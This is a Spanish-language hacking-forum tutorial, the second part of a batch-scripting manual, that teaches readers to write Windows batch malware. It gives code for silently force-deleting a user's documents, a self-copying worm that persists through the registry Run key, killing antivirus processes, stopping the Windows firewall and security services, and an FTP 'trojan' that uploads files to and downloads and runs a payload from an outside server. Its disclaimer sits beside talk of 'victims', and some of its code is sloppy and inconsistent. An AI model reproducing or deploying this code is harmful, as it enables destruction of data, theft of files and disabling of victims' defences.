Manual Batch

Hola compañeros foreros, este tutorial esta dedicado principalmente a HxC, MH, Cuh (en donde soy Gaara_18) y i-H, entre otra comunidades en donde ando, recordar que esta es la segunda parte del Manual Batch (Nivel Medio) By 2Fac3R/RocKeG, y esta parte esta dedicada a los Malwares, esta será la parte mas extensa del manual asi que preparence, los temas que veremos aquí serán, Bucle, Virus, Worms, ProcessKiller, AvKiller y Troyanos, también mencionar que no me hago responsable de el mal uso del que le den a esta información, únicamente lo hago con el fin de que aprendan a hacer sus programas en Batch, sin mas hire por el orden mencionado asi que manos a la obra!!!:

Ya había mencionado lo de los Bucles, y se los había dejado a su búsqueda, ahora veremos varias formas de hacer un Bucle, vamos a un ejemplo sencillo de un Bucle infinito: @echo off :inicio Start www.hackxcrack.es Goto :inicio Exit

Este código lo que hara seia crear una etiqueta llamada “:inicio” y abre el foro de HxC infinitamente hasta que la pc se trabe, ahora vamos a un pequeño Bucle con diferentes cosas:

@echo off :inicio Start /min www.hackxcrack.es Start/min www.masters-hackers.info Start/min www.foro.el-hacker.com Start/min www.i-hacker.info Start Goto:inicio exit Lo que hace el code es simple, aprovecho para invitarlos a que vayan a estas comunidades donde me he sentido muy bien en ellas :D, bien, el bucle no es tan interesante, únicamente es para hacer una pequeña bromita, pero recuerda que hacer mucho esto es de lammers :D, asi que solo háganlo para aprender como funka :p, ok seguire con los Virus, que este concepto se tiene muy diferente por los

que andamos en esto del Hacking, en lo personal para mi un Virus es un archivo que solo se encarga de destruir mas archivos, con el fin únicamente de Ch1nG4R al administrador de la pc, no recomiendo que distribuyan sus ‘Virus’ porque para mi eso es de lammers, pero bueno sigo con el code, dado mi discurso, sabemos que un virus es para borar archivos asi que supongo que sabras como esta compuesto un virus en Batch. -Mmm… con “Del”?Exacto! Entonces vamos a codear, bien ¿Qué queremos que haga nuestro Virus?, mmm… pues empezare con un simple virus que destruya todos los archivos de la carpeta “Mis documentos”, para ello es necesario conocer las variables de entorno para este caso vamos a usar una que llevamos usando. –Ahh ya sé! %homepath%-

Exacto!, vamos al code.

@echo off Del %homepath%\Mis documentos\*.* Exit

NO LO EJECUTES!!! Antes decirte que este code para ser Virus pues no nos funcionaria porque pide confirmación para que elimine los archivos y lógicamente la victima no lo ejecutara, entonces para que nos funcione vamos a usar algo mas reforzado, usaremos el comando “attrib” y los parámetros de “del”, vamos a cmd y tecleamos “del /?” (sin comillas) y veamos que nos sale…: [code] Elimina uno o mas archivos.

DEL [/P] [/F] [/S] [/Q] [/A[[:]atributos]] nombres ERASE [/P] [/F] [/S] [/Q] [/A[[:]atributos]] nombres

nombres directorios.

Especifica una lista de uno o m s archivos o

Se puede utilizar comodines para eliminar varios archivos. Si se especifica un directorio todos sus archivos se eliminar n.

/P

Pide confirmaci¢n antes de eliminar cada archivo.

/F

Fuerza la eliminaci¢n de archivos de s¢lo lectura.

/S Elimina archivos especificados en todos los subdirectorios. /Q Modo silencioso. No pide confirmaci¢n con comod¡n global /A Selecciona los archivos que se van a eliminar bas ndose en los atributos atributos sistema

R Archivos de s¢lo lectura

H Archivos ocultos

S Archivos de

A Archivos preparados

para almacenamiento - Prefijo de exclusi¢n

Si las extensiones de comando est n activadas DEL y ERASE cambian de la siguiente manera:

La sem ntica que se muestra para el modificador /S est invertida de tal modo que le muestra solamente los archivos eliminados y no los que no se encontraron. [/code] Analicemos los parámetros, nos dice que el parámetro “/f” fuerza la eliminación del archivo, pues vamos a usarlo, usaremos también el “/s” para que elimine en todos los subdirectorios :D y usaremos “/q” para que sea ‘Silencioso’. -¿Entonces como quedaría el code?Pues el code quedaría asi: @echo off Attrib –r –a – s –h “%homepath%\Mis documentos\*.* Del /p /q /s “%homepath%\Mis documentos\*.* Exit

-Ohh crei que se te había olvidado lo del comando Attrib que mencionaste que usaríamos pero ahora veo que no :DPues ya ves que no :p, entonces ese seria el code, no lo ejecuten en su maquina a menos que tengan una maquina

virtual para este tipo de pruebas, si eres mas avanzado quizás pienses: -Que le pasa a este man, porque no usa for y se deja de escribir tanto códigoClaro!, creo que tienes algo de razón pero como he dicho a lo largo de estos manuales que lo dejare a tu búsqueda, pero no te preocupes va a llegar algún momento en donde explique el comando, todo a su tiempo :p. Antes de continuar lo dejo a su imaginación ‘que borran’ con su pequeño virus en Batch, recuerden que sabiendo como funka una pc podrán borrar ciertos archivos y dejarla inservible (para algunas victimas, otras no son tan tontas y pueden recuperarse bajo este tipo de ‘ataques’, pero pues son menos que las que no :D) , bien sigamos con lo que nos interesa, ahora les mencionare ‘como’ hacer un worm, ya habíamos hecho uno en el primer manual, pero era muy simple para que nos interesara al 100, pues ahora voy a suponer que tienes tu “virus” y lo quieres propagar (o saber como se propaga con Batch ) , lo que vamos a hacer con nuestro virus es copiarlo a la carpeta “system32” y agregarlo al registro para que se inicie con Windows , quizá esto te suene a Chino, pero es aquí donde se va a alargar este tuto, voy a explicar el uso del registro (brevemente, ya sabes, si quieres algo mas complejo busca

por Google|Altavista|Yahoo o el que desees), también explicare el uso del For :D -Por fin!!!, el famoso for!Y varias cosillas mas, bueno primero les mostrare el code e ire explicándolo: @echo off REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVer sion\Run /v VIRUS.bat /t REG_SZ /d "%WINDIR%\14785\SYSTEMSHELL.exe" /f Copy %0 %windir%\system32 Exit Con eso es mas que suficiente, lo demás lo dejare a su búsqueda ya que no me gusta este tipo de cosas, solo las explico para que aprendan como funciona y como defenderse de ellas, bueno explico; Lo primero es cuando se agrega al registro, en este caso se va a agregar al Run, para que se inicie con Windows, donde dice “VIRUS.bat” es donde vas a poner la ruta del “Virus” que hemos creado o poner la ruta del programa que quieres que se incie con Windows :D, la siguiente línea les debe ser conocida ya que ya la habíamos usado anteriormente, pero por si se te había olvidado, se copia a si mismo en la carpeta system32 que esta en la carpeta “Windows”. En este caso les dejare una tarea xD, espero que la hagan no como en la escuela que no las entregan xD, la pequeña tarea es que se copie a cualquier dispositivo USB que se conecte, te dare una pista; Usa el comando “IF exist” que seguramente ya lo habías buscado por ahí, puedes mandármelo por mp o simplemente postearlo en los foros anteriormente mencionados o de donde sacaste este manual (Excepto Taringa xD). Muy bien, sigamos con el manual, empezaremos con un pequeños Taskkiller (Asesino de procesos), esto nos servirá para poder sacar del juego casi cualquier proceso (esto

incluye el de los AntiVirus (AV), los comandos que aprenderemos en este tuto son el Tskill o TaskKill y tasklist. Nosotros utilizaremos tskill, bien voy a un ejemplo simple de su uso, primero abriremos el internet explorer  @echo off Tskill 1716 Exit -Como pero asi de fácil?Claro esto es muy fácil, lo único que tienes que hacer es poner el nombre del proceso a eliminar. -¿Pero como le hago si quiero eliminar otro proceso?, explicame otro ejemplo para tenerlo mas claro, además no entendí porque ese numero :DBien, te explicare otro, abre la calculadora del Windows. -¿Cómo la abro?Inicio  Todos los programas  accesorios  calculadora :D Ahora ve al cmd (inicio  ejecutar cmd  enter) y teclea “tasklist” Te ha salido una lista de los procesos que se están ejecutando en este momento, pues busca ahora el de la calculadora, Deberias haber encontrado un proceso llamado “calc.exe” con un pid de 544, pues adivina… Ese es el nombre que vamos a poner después de tskill, vamos al code: @echo off Tskill 544 Exit Y ejecutalo, recuerda que no deberías de haber cerrado manualmente la calculadora antes, osea tiene que estar activa en el momento de que la ejecutes :D. Si eres un poco curioso te habras dado cuenta de que no has podido cerrar el proceso del AV, pues eso es algo mas complejo, para poderlo cerra primero debes saber que servicios lo están „Protegiendo‟ pero ese tema se sale de esto asi que lo dejare a

tu búsqueda, para que busques específicamente de tu AV :p, entonces buscado esto sabras como hacer un AVKiller, que es un programa en el que primero se quitan los procesos del AV y después elimina por completo de donde se instalo, busca y busca seguro encontraras :D.Pero por si no encuentras en la próxima parte prometo poner un buen code de AVKiller  si es que veo que hay gente que lo hace xD, Lo que sigue para mi es lo mejor, ya sabran los de HxC me ha pegado eso de poner lo mejor al final xD, asi que iremos a lo mejor que es el Troyano, en este caso lo voy a hacer con el comando Ftp (que seguro ya sabes lo del FTP porque te haz leído las revistas ;) básicamente combonare varias cosas que hemos estado viendo en este manual. VAMOS A CREAR UN TROYANO EN BATCH!!! Bien empezare por explicarles el code que es este: @echo off Echo USER>Troj.tmp Echo PASWORD>>Trojan.tmp Echo get Virus.bat>>Trojan.tmp Echo bye>>trojan.tmp Echo quit>>trojan.tmp Start –s:Trojan.tmp Servidor de FTP Del /f /s /q Trojan.tmp Start/min Virus.bat Copy % %windir%\system32 Exit

Vamos a crear un archivo llamado “Trojan.tmp” con las siguientes características: Abrir el ftp poniendo nuestro nombre de usuario (que el lo que sustituiras para que te funcione al 100, después ponemos la contraseña que tenemos para usar el ftp, y vamos ahora a los comandos del ftp si vamos al cmd y tecleamos “ftp /?” veremos que nos dara error y automáticamente nos abrirá el servicio FTP, ahora ahí dentro ponemos “help” (sin las comillas) y nos saldrán los comandos que podemos utilizar en el servicio FTP dentro de nuestro cmd o bat, voy ahora a explicar unos cuantos que nos servirán como ayuda para nuestro pequeño troyano en batch, los comandos son, put, get, del, cd, mkdir, rename y rmdir. Los demás los dejare a su búsqueda, empecemos el comando del ftp “put” nos sirve para subir un archivo a nuestro servidor ftp, vamos a hacerlo en la cmd vamos a teclear “ftp” (recuerda que sin las comillas :D) y nos ha salido esto:

No recuerda que no soy adivino xD. Bien ahora tecleamos nuestro servidor ftp, en mi caso es www.elanime.do.am :D, aprovecho para invitarlos a mi web. Ok sin mas vamos a la practica tecleamos “open www.elanime.do.am” (recuerda que debes sustituir por el nombre de tu servidor de ftp) y nos saldrá esto:

Ahora debemos poner el nombre de nuestro usuario y contraseña, y nos saldrá esto:

Bien ahora estamos adentro de nuestro servidor ftp, vamos a hacer algo, subiremos y descargaremos archivos. Vamos al put , get y “dir”, -Pero que has dicho? “Dir” es un comando del batch no?Claro veo que has estudiado por tu cuenta, recuerda que este manual es solo un pequeño “amigo” para aprender cosas que en otros manuales no he visto :D, bien sin mas vamos al ejemplo, vamos a hacer un dir. Vamos teclea “dir”

El dir nos listara los archivos que tenemos en nuestro ftp, y vemos varios archivo voy a bajar en especifico 1 y subiré un archivo de “prueba.txt”, basta de teoría y vamos al ejemplo:

Como ven si le damos enter nos descargara el archivo mencionado, que es “libro3.jpeg” que en este caso es una imagen del 3er libro del Avatar xD (el libro fuego),

Este es el resultado que tienes que tener, ahora vamos a ver si nos la ha descargado en realidad:

xD disculpen que este tan distorsionada pero era para que se entendiera el ejemplo xD, sigamos, ahora vamos a subir un archivo, vamos a la cmd de nuevo, y tecleamos “put prueba.txt” (recuerda que yo subiré este archivo que esta en %homepath% -¿Por qué ahí?Pues si te haz fijado en la primera imagen, al iniciar la cmd me aparece esa ruta por defecto, pondré la imagen nuevamente :

Vemos, que nos aparece en donde dije, esto puede varias depende de la configuración de la pc, asi que no te asusten ni pienses que no te funcionara si no tienes esta ruta :D, bien vamos a continuar. Bien, se supone que haz intentado teclear “put prueba.txt” que en mi caso tiene que estar en %homepath% osea en la carpeta del usuario (si no entiendes esto del %homepath% leete las partes anteriores del manual). Vamos a la imagen para que vean que funciona :D

Bien funciono, ahora vamos a hacer un dir para verificar que este ahí :D.

Aquí estamos viendo el archivo “prueba.txt” (a la derechar) subido correctamente y lo demás que esta subrayado son los informe del archivo subido, ok ya entendido todo esto sabemos como funciona el servidor FTP y hemos hecho una prueba de subir y bajar archivos. Ahora vamos a transformarlo a batch y no solo en cmd, vamos a nuestro code de ejemplo el cual sube el prueba.txt y baja “libro3.jpeg”. @echo off Echo USUARIO>trojan.tmp Echo PASSWORD>>trojan.tmp Echo put prueba.txt>>trojan.tmp Echo get libro3.jpeg>>trojan.tmp Echo bye>>trojan.tmp Echo exit>>trojan.tmp ftp-s:trojan.tmp www.elanime.do.am exit

Este es un simple “Troyano” el cual se puede hacer muchísimo con esto, cabe decir que si el puerto necesitado por el ftp es el 23 como muchos ya sabran y pues si el puerto esta cerrado esto no funcionara, tampoco funcionara en caso de que el firewall nos bloquee el paso, para ello tenemos que hacer varias combinaciones de nuestros códigos, por ejemplo primero cerraremos el firewall para ello necesitamos este code: @echo off Net Stop “Centro de Seguridad” Net Stop “Firewall de Windows/Conexión compartida a Internet (ICS)” Exit

Tambien mencionar que este code solo desactiva el firewall de Windows, si nuestra ‘Victima’ tiene otro Firewall como el ZoneAlarm no funcionara , pero recuerden que lo dije en un principio :D. Entonces lo dejo a su imaginación, recuerden lo que hemos visto en esta parte, worm, virus, bucles, AvKiller, etc. Y si le hechan imaginación seguro podras sacar sin problemas al firewall y al AV para poder meter nuestro pequeño “amiguito” (supongo que sabes a que me refiero no ;D. Sin mas esta es la ultima parte “Publica” por el momento ya que unire varias partes y mejorare el manual para dejarlo en uno solo y participar en el concurso de HxC, asi que por el momento seria todo, apréndanse bien todo porque cuando regrese, regresare mas que nuca, además anticiparles que quizá haga en un futuro un manual de HTML con mi estilo de ‘Explicar’ las cosas :D. Les recuerdo que pueden hacer con este manual lo que se les ocurra y se les antoje, menos decir que ustedes lo hicieron xD, recuerden mencionar el Autor del Manual (Gaara_18|2Fac3R|RocKeG), sin mas decirles que este manual fue hecho específicamente para HxC y I-H! pero en las otras comunidades donde ando también lo posteare para que me critiquen (no muy gacho por favor xD).

Me despido 2Fac3R